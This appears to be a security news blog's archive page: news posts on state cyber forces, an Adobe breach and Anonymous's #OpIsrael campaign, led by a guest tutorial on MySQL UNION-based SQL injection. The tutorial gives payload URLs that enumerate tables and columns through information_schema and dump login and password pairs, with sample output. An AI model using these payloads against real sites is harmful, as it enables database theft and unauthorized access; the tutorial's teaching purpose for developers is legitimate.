Showing posts sorted by date for query cyber security force. Sort by relevance Show all posts
Showing posts sorted by date for query cyber security force. Sort by relevance Show all posts

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

Posted by Avik Sarkar On 12/02/2013 01:00:00 am

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.
                                                                                                       
Understand the technique MySQL Injection: 
One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP
 
(Figure 1) Detecting
Searching Column number (s): We will test earlier in error, then no error may be said to find.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION
Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.
**********
I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

'The Secret Files'- Hackers Exposed Personal Details of Celebrities, Public Figure, FBI Director & National Leaders

Posted by Avik Sarkar On 3/18/2013 04:15:00 am

'The Secret Files'- Hackers Exposed Personal Details of Celebrities, Public Figure, FBI Director & National Leaders 

Yet again celebrities fallen victim to cyber attack, no this time not the nude photo but confidential personal information. Renowned public figure, national leaders, celebrities like Kim Kardashian, US Vice President Joe Biden, Hillary Clinton, Mel Gibson, Michelle Obama, Ashton Kutcher, Jay Z, Beyoncé, Paris Hilton, Britney Spears, Sarah Palin, Hulk Hogan, Donald Trump and Arnold Schwarzenegger together became prey. The list does not end here, the hacker catches two more big fishes in his net and they are head of the Los Angeles police force Charlie Beck and FBI Director Robert Mueller. Many of you might be astonished of how such big public figure, including Vice President, FBI Director became victim in single round of cyber attack! Let me tell you what exactly happened- the hacked data dubbed "The Secret Files" by the hackers contains personal information and credit reports (including social security numbers, details of their mortgages, addresses, and details of their credit card and banking details) was made public by those hackers on a new website, as shown in the picture below. 

The hacker left a message or in other word a satire while saying "The Secret Files - If you believe that God makes miracles, you have to wonder if Satan has a few up his sleeve." Such hack, is very rare, where numbers of big fish get caught. The nature of this hack can be categorized as a clear identity theft. But the question is how? Well the answer is some of the United States' top credit bureaus have come forward and acknowledged that fraudulent and unauthorized access to the records of well-known figures have taken place. Most of the reports were apparently obtained from one of the three major U.S. credit ratings agencies Equifax, TransUnion and Experian — via a special Internet portal they maintain for the public to check their own credit ratings. All three companies have said that some of their reports had been fraudulently accessed since Monday by someone using personal data about the victims. Security experts said that suggests the attack is a “social hack” rather than a classic cyber security data breach


-Source (Sophos & WT)




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

China Claiming Their Defense & Military Sites are Serially Attacked By U.S. Hackers

Posted by Avik Sarkar On 3/04/2013 08:31:00 pm

China Claiming Their Defense & Military Sites are Serially Attacked By U.S. Hackers 

We all are very much familiar of hearing the story of cyber espionage and cyber attacks originated from China by Chinese hackers. Where many countries across the globe have fallen victim like U.S. India, JapanSouth Koreamany European countries and many more. But today a complete reverse story came under light where the Chinese government are claiming that several top secrete government sites like defense, army, military were targeted and hit by hackers from United States. According to some classified sources it came that Chinese government websites are routinely hacked from IP addresses originating within the United States. In a news conference, spokesman of Defense Ministry of China; Mr. Geng Yansheng said that - more than 144,000 hacking attempts per month are targeted at the China Military Online and Defense Ministry websites. According to Chinese defense ministry a close to two-thirds of those attacks (62.9 percent) originated in the United States. Geng said he had noted reports that the United States planned to expand its cyber-warfare capability but that they were unhelpful to increasing international cooperation towards fighting hacking.
"We hope that the U.S. side can explain and clarify this." The U.S. security company, Mandiant, identified the People's Liberation Army's Shanghai-based Unit 61398 as the most likely driving force behind the hacking. Mandiant said it believed the unit had carried out "sustained" attacks on a wide range of industries. Yansheng did not mention a direct link between the cyber attacks and the U.S. government only that the attacks originated in the United States. He did note, however, that China is concerned with reports that the United States is planning to expand its cyber warfare capabilities. 
In the last month China was blamed for engaging cyber attacks against several high profile websites and organization of U.S. including New York Times, Twitter, NBC and so on. And if you refresh our memory then then we will find the scenario of big cyber attack and espionage by Chinese hackers have been spotted several times. In 2012 Chinese hackers had  breached Telvent's corporate network & gained control of US Power GridAlso in the middle of last year, we have seen that Chinese hackers have broken into Indian Navy's Computer System & stolen sensitive data. Few months before this hack, Tokyo based computer security firm Trend Micro confirmed that Chinese hackers were responsible for biggest cyber-espionage in India, Japan & Tibet. Also the director of National Security Agency (NSA) General Keith Alexander confirmed that hackers from China was responsible for the serious attack on one of the leading IT security & cyber security company RSAAlso in 2011 China was responsible behind the attack on US Chamber of Commerce, Satellite System of U.S, Nortel Network & so on.  But few days ago National Computer Network Emergency Response Coordination Center of China (CNCERT/CC), China's primary computer security monitoring network claimed that China fallen victim of one of biggest cyber attacks originated from US, Japan & South Korea. We must have to say that this statement is truly irrelevant. Cyber crime investigator have found that China was directly responsible for the hack into Japan's Biggest Defense Contractor Mitsubishi, Japan Aerospace Exploration Agency (JAXA) & Parliament of Japan. In case of South Korea  more than 13 Million of MapleStory players data has been stolen, there also hackers from China was responsible. 
After keeping in mind all the above facts, we can not conclude the matter very easily, but what we can say that, whether China is responsible or not is neither been proved so far. In spite of looking at the situation we can only say, the entire matter is foggy; where the original truth has either been manipulated or been still untold. But it is sure that those untold or manipulated issues will some day came in front, till that time we have to keep patience and don't forget to stay tuned with VOGH for all kind of cyber related topics and expert reviews.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

President Obama & Congress Will Issue Long Awaited Executive Cyber Security Order

Posted by Avik Sarkar On 2/12/2013 07:05:00 pm

President ObamaCongress Will Issue Long Awaited Executive Cyber Security Order 

Last week we reported that Pentagon has declared that they are moving toward a major expansion of its cyber security force to counter increasing attacks on the nation’s computer networks, as well as to expand offensive computer operations on foreign adversaries. Just one week after this declaration another crucial movement came from the U.S. government.  A secret legal review on the use of America’s growing arsenal of cyber weapons has concluded that President Obama has the broad power to order a pre-emptive strike if the United States detects credible evidence of a major digital attack looming from abroad. According to sources President Barack Obama will issue a long-awaited cyber security executive order this week. Two former White House officials told the publication that the order is expected to be released after Tuesday night's State of the Union address. 
Given his status as commander-in-chief, Obama seems to be the clear choice, but since cyber warfare is such a new and unknown thing, the government hasn't actually figured out the rules of engagement yet. In the past couple of decades, the power to use America's cyber weapons has been shared between the Pentagon and the various intelligence agencies. With the exception of a series of strikes on the computer systems that run Iran's nuclear enrichment facilities an attack that Obama ordered himself the U.S. hasn't launched any major cyber attacks in recent memory, however. This probably won't be the case in the future. So the government is working on new rules of engagement, as it realizes that the capabilities of cyber weapons are evolving at a startling rate. The rules will be not unlike the set that governs how drone attacks are ordered and who orders them. Cyber warfare certainly stands to affect the average American more, though.  On Capitol Hill this week, Rep. Dutch Ruppersberger (D-Md.) and Rep. Mike Rodgers (R-Mich.) are set to reintroduce the Cyber Intelligence Sharing and Protection Act (CISPA) during a speech at the Center for Strategic and International Studies.
According to an exclusive report the bill would allow the government to share classified cyber threats with the private sector so that those companies can then protect their systems from cyber attacks. The bill was killed last year due to privacy concerns. Civil-liberty groups argued that the bill allows companies to exchange too much personal information back and forth without regulation. 







SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Pentagon Assigning More Experts to Boost Cyber Security & Protect U.S. Computer Networks

Posted by Avik Sarkar On 2/06/2013 07:12:00 pm

Pentagon Assigning More Experts to Boost Cyber Security & Protect U.S. Computer Networks

Cyber security has become one of the most sophisticated area of National security and defense, and in order to implement that Pentagon has increased their estimated expense on cyber security. And this deceleration has been made while publishing the budget late in last year. Now that implementation is getting executed as the Pentagon is moving toward a major expansion of its cyber security force to counter increasing attacks on the nation’s computer networks, as well as to expand offensive computer operations on foreign adversaries. This confirmation has came from defense officials. The expansion would increase the Defense Department’s Cyber Command by more than 4,000 people, up from the current 900, an American official said. Defense officials acknowledged that a formidable challenge in the growth of the command would be finding, training and holding onto such a large number of qualified people. The Pentagon “is constantly looking to recruit, train and retain world class cyberpersonnel,” a defense official said Sunday.
As part of the expansion, officials said the Pentagon was planning three different forces under Cyber Command: “national mission forces” to protect computer systems that support the nation’s power grid and critical infrastructure; “combat mission forces” to plan and execute attacks on adversaries; and “cyber protection forces” to secure the Pentagon’s computer systems. Cyber Command’s connections to the NSA are also leading some officials to ask how much of the expansion will be focused domestically, especially considering the opening of the NSA’s new, $2 billion Utah Data Center, scheduled to go live later this year. An unnamed "senior defense official" said that the agency’s efforts would remain focused outside US networks, unless it were asked to assist "another agency with domestic authority, such as the FBI." There is significant overlap between Cyber Command and the NSA — until recently, some employees of the former had nsa.gov email addresses, for instance — and there is some doubt that the nascent offshoot of US Strategic Command will be able to achieve true independence under NSA Director Alexander.



-Source (NY Times, Washington Post)







SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Hong Kong Govt Opens a New Cyber Security Center Worth $9 Million

Posted by Avik Sarkar On 12/13/2012 07:35:00 pm

Hong Kong Govt Opens a New Cyber Security Center Worth $9 Million

Now a days cyber attack has became one of the most challenging issue for almost every country and its Government. Previously we have seen cyber awareness were mainly limited to the first world countries like USA, England, Australia and few other European countries. While keeping in mind the rising amount of cyber threats and its output, now both second world and the third world countries have also taken this issues very seriously. To get rid of this burring challenge and to make it's cyber fence safe and secure The Hong Kong Govt launched a Cyber Security Center on December 7 to enhance the city’s internet security and protection of critical infrastructure, and strengthen the defense against cyber-attacks. Hong Kong Govt has spent HK$9 million (£730,000) for this new Cyber Security Center in a bid to tackle the growing threat to critical infrastructure in the Special Administrative Region of China. The Center  which will operate under the Technology Crime Division of the Commercial Crime Bureau, will start with a force of 27 police personnel, ranking from Police Constable to Chief Inspector. “The incidence of cyber-attacks is increasing,” said Tsang Wai-hung, Commissioner of Police, during the inauguration ceremony of the Center  “Police recognize the need to respond to the worldwide cyber crime phenomenon, particularly cyber-attacks aimed at critical infrastructures, by enhancing our readiness and capability to counter such threats.

So far the Cyber Security Center has been given four main responsibilities as follows:-
  1. It will strengthen collaboration with other government departments and stakeholders, both local and overseas, concerning cyber-attacks against critical infrastructures. 
  2. It will monitor the flow, but not the content, of data traffic of major infrastructure systems.
  3. The Center will collect intelligence to analyse cyber-attacks, and provide an immediate response when necessary.
  4. The Center will conduct research into cyber security and cyber-attacks, and perform security audits to maintain the protection of Hong Kong.

In addition to these key responsibilities, the Center will support the daily operations of the Technology Crime Division in the prevention and detection of technology crimes. 




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

UK Announces Plans for ‘Cyber Reserve’ Online Crime Defence Force

Posted by Avik Sarkar On 12/08/2012 05:57:00 pm

UK Govt. Announces Plans for ‘Cyber Reserve’ Online Crime Defense Force

Earlier this week, the UK government announced that it was planning on setting up a ‘cyber reserve’ force aimed at dealing with security threats brought about by online crime. The proposed force will be run by the country’s ministry of defense and is going to allow the armed forces to draw on the nation’s computer-related talents in order to ward off online attacks and stem the tides of cyber crime. Minister for the Cabinet Office Francis Maude claims that ‘critical’ work is required in order to combat online lawbreaking. He says that nine tenths of large British corporations and three quarters of small British businesses have reported experiencing a cyber breach within the last year, meaning that this force has now become a necessity.

Cyber Crime in the UK
Research conducted by a team of academics recruited by the UK Ministry of Defense earlier this year concluded that the country spends a billion US dollars per year on protecting against and cleaning up after instances of cyber crime. This includes the cost of measures taken to safeguard bank account security and reduce computer-related fraud, the money forked out by businesses purchasing anti-virus software and the cost of removing viruses from computers. In addition to criminals, terrorists and rogue states have also targeted computers in the UK, meaning that it is not difficult to see why the country would consider setting up such a force.

More Students Trained in Tackling Cyber Crime Needed
Maude has promised to make the UK one of the safest places in the world to conduct online business. He added that further details of the ‘cyber reserve’ plans would be revealed in 2013 and said that British government agencies and departments are working with professional bodies in order to ensure that the consideration of internet security becomes an integral component of corporate governance and the risk management process. He stated that UK officials want more students in the country trained in the skills required for tackling cyber crime and pointed out that the nation’s ministry of defense is examining new methods for attracting talented cyber security specialists, as they are required for critical areas of work.

Cyber-Spying by Hostile Nations
The UK Ministry of Defence’s announcement came in the wake of revelations that hostile foreign states had carried out ‘mapping’ of the systems that control the country’s power and water supplies. Officials refused to name the nations that were believed to have carried out this mapping but there have been reports in the United States that China and Russia have conducted similar reconnaissance exercises there, which suggests that they could be the countries that are responsible for this cyber-spying activity. With this in mind, it is little wonder the UK is stepping up its security, as it wishes to safeguard vital information.

Cyber Confidence Tracker
Francis Maude stated that the increasing number of threats posed to the UK’s online security is partly down to the growth of the internet economy. He said that the country’s government cannot take sole responsibility for fighting cyber crime and emphasized the fact that individuals and businesses would also have to play their part. Next spring the UK will be taking steps to improve online security for consumers and small businesses. The nation plans on launching a ‘cyber confidence tracker’, which will keep tabs on online behaviors and perceptions about internet security in an effort to ensure that the advise that they are delivering to the public about this subject is being conveyed in the best possible way.

Implications
It appears that the UK is now taking the threat of cyber attack extremely seriously, which it is wise to do considering the increasing trend of nations targeting the infrastructures of those that they are hostile towards via the internet. This is a sign that the web is becoming the new battleground in the international struggle for power. The full extent of the country’s plans for its ‘cyber reserve’ are not yet known. It is also questionable whether it will be used solely for defense purposes. Espionage is no longer dominated by spies being physically placed in another country. It is now evidently moving online, meaning that countries are being forced to adapt and develop cyber spies of their own.


Special article by 
Evelyn Anderson of International Business and Journalism
Guest Editor VOGH








SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Adobe Confirms Data Breach, Hacker Leaked More Than 150,000 Customer Details

Posted by Avik Sarkar On 11/21/2012 01:17:00 am

Adobe Confirms Data Breach, Hacker Leaked More Than 150,000 Customer Details 

Yet again Adobe, the American multinational computer software company had fallen victim of cyber attack. In September Adobe faced what it called a sophisticated cyber attack where hackers have breached Adobe server in order to compromise certificate to sign malware. As a move Adobe revoked those certificates on October 4th. After that massacre, here again one of Adobe's databases has been breached by a hacker and that it has temporarily taken offline the affected Connectusers.com website. The attacker who claimed responsibility for the attack, told that he used a SQL injection exploit in the breach. Adobe confirmed the breach and said that the hacker indeed managed to break into an Adobe server and copy the private credentials of approximately 150,000 users – including their names, email addresses and password hashes. Those affected accounts include Adobe customers, Adobe employees and partners along with U.S. military users including U.S. Air Force users, and users from Google, NASA, universities, and other companies. To prove the attack, the intruder, who goes by the name of "ViruS_HimA" and claims to be from Egypt, has released extracts from his haul on the Pastebin text hosting service. 
"It was an SQL Injection vulnerability -- somehow I was able to dump the database in less requests than normal people do," said ViruS_HimA. Users passwords for the Adobe Connect users site were stored and hashed with MD5, says the hacker, which made them "easy to crack" with freely available tools. And Adobe wasn't using WAFs on the servers, the hacker notes. "I just want to be clear that I'm not going against Adobe or any other company. I just want to see the biggest vendors safer than this," he told the press. "Every day we see attacks targeting big companies using Exploits in Adobe, Microsoft, etc. So why don't such companies take the right security procedures to protect them customers and even themselves?"
"Adobe is a very big company but they don't really take care of them security issues, When someone report vulnerability to them, It take 5-7 days for the notification that they've received your report!!" he wrote. "It even takes 3-4 months to patch the vulnerabilities!" 
While talking about such big cyber attacks, here we would like to give you reminder that in the last few months we have been a slew of attacks against the following sites: Guild Wars 2GamigoBlizzardYahooLinkedIneHarmonyFormspringAndroid ForumsGamigo,  Nvidia,BlizzardPhilips, Zynga, VMWare, & so on. For all the latest on cyber security and hacking related stories; stay tuned with VOGH


-Source (Dark Reading, The-H)





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

#OpIsrael: Anonymous Hacked Israeli Defense Force & 40 Other Israeli Sites While Protesting Gaza Attacks

Posted by Avik Sarkar On 11/16/2012 05:16:00 pm

#OpIsrael: Anonymous Hacked Israeli Defense Force & 40 Other Israeli Sites While Protesting Gaza Attacks

So far the world have seen an instance of cruelty and inhumane of Israeli army, where the people of Gaza have been tortured brutally. The peace loving people across the world have already stood against this relentless practice. Earlier we have seen many times, where hackers around the globe protested against this implacable practice of Israeli defense.  But so far it was mainly hacker collective from Pakistan who was mainly fighting for the Gaza cause, dubbed Freedom For Palestine (#OpFreePalestine), yesterday the dangerous & mysterious hacktivist group Anonymous joined the campaign. This Thursday Anonymous released a manifesto, vowing revenge on Israel for an escalating offensive in Gaza. The group's new campaign named Operation Isreal (#OpIsrael) comes after rumors that Israeli forces would shut down telecommunications in Gaza, including the internet. OpIsrael started with a series of attacks where Anonymous went on a spree of website defacement and takedown, while calling their members to flood forty sites with junk web traffic designed to knock them offline and defacing websites including the privacy firm Israeli Security Academy and a blog the group described as belonging to the Israeli Defense Forces. “We Anonymous will not sit back and watch a cowardly Zionist State demolish innocent people’s lives.” reads one message posted to a defaced site, along with an image of smoke rising over what appears to be a Palestinian city. Another message on a hacked site attributes the attack to Pakistani Anonymous hackers: “The people of Pakistan are always supporting the brave people of Gaza, we love you!” 
Here we would like to remind you, that in 2011, members of Anonymous threatened to engage cyber attack against Israel, while protesting the same issue. That time also Israeli Defense Force was shutdown by  Anon. 
Anonymous Twitter accounts provided links to what they described as an Anonymous Gaza Care Package with tools for staying online if Israel cuts Internet service the Gaza Strip during its military action. Another hacker group, Telecomix, provided its own detailed instructions in English and Arabic for using dial-up connections, a technique it first suggested during the Egyptian Internet outage surrounding the Arab Spring protests there last year. 

Operation Israel (Full Press Release of Anonymous):-
"Greetings World --

For far to long, Anonymous has stood by with the rest of the world and watched in despair the barbaric, brutal and despicable treatment of the Palestinian people in the so called "Occupied Territories" by the Israel Defense Force. Like so many around the globe, we have felt helpless in the face of such implacable evil. And today's insane attack and threatened invasion of Gaza was more of the same.

But when the government of Israel publicly threatened to sever all Internet and other telecommunications into and out of Gaza they crossed a line in the sand. As the former dictator of Egypt Mubarack learned the hard way - we are ANONYMOUS and NO ONE shuts down the Internet on our watch. To the IDF and government of Israel we issue you this warning only once. Do NOT shut down the Internet into the "Occupied Territories", and cease and desist from your terror upon the innocent people of Palestine or you will know the full and unbridled wrath of Anonymous. And like all the other evil governments that have faced our rage, you will NOT survive it unscathed.

To the people of Gaza and the "Occupied Territories", know that Anonymous stands with you in this fight. We will do everything in our power to hinder the evil forces of the IDF arrayed against you. We will use all our resources to make certain you stay connected to the Internet and remain able to transmit your experiences to the world. As a start, we have put together the Anonymous Gaza Care Package - http://bit.ly/XH87C5 - which contains instructions in Arabic and English that can aid you in the event the Israel government makes good on it's threat to attempt to sever your Internet connection. It also contains useful information on evading IDF surveillance, and some basic first aid and other useful information. We will continue to expand and improve this document in the coming days, and we will transmit it to you by every means at our disposal. We encourage you to download this package, and to share it with your fellow Palestinians to the best of your ability. 

We will be with you. No matter how dark it may seem, no matter how alone and abandoned you may feel - know that tens of thousands of us in Anonymous are with you and working tirelessly around the clock to bring you every aid and assistance that we can.

We Are Anonymous
We Are Everywhere
We Are Legion
We Do Not Forgive
We Do Not Forget

To the oppressors of the innocent Palestinian people, it is to late to EXPECT US"


-Source (Forbes) 






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search